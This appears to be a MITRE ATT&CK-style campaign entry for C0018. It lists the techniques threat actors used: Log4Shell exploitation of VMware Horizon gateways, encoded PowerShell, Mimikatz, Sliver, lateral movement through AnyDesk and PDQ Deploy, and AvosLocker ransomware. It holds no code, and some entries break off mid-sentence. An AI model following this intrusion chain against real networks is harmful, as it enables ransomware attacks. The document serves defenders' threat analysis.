|Application Layer Protocol
|During C0018, the threat actors used HTTP for C2 communications.
|Command and Scripting Interpreter
|During C0018, the threat actors used encoded PowerShell scripts for execution.
|Data Encrypted for Impact
|During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network.
|Exploit Public-Facing Application
|During C0018, the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.
|Ingress Tool Transfer
|During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network.
|Lateral Tool Transfer
|During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.
|During C0018, AvosLocker was disguised using the victim company name as the filename.
|Match Legitimate Name or Location
|For C0018, the threat actors renamed a Sliver payload to
|Network Service Discovery
|During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning.
|During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.
|Obfuscated Files or Information
|During C0018, the threat actors used Base64 to encode their PowerShell scripts.
|For C0018, the threat actors acquired a variety of open source tools, including Mimikatz, Sliver, SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy.
|Remote Access Software
|During C0018, the threat actors used AnyDesk to transfer tools between systems.
|Remote Desktop Protocol
|During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.
|Software Deployment Tools
|During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.
|System Binary Proxy Execution
|During C0018, the threat actors used
rundll32 to run Mimikatz.
|System Network Configuration Discovery
|During C0018, the threat actors ran
nslookup and Advanced IP Scanner on the target network.
|System Owner/User Discovery
|During C0018, the threat actors collected
whoami information via PowerShell scripts.
|Windows Management Instrumentation
|During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (
wmiprvse.exe) to execute a variety of encoded PowerShell scripts using the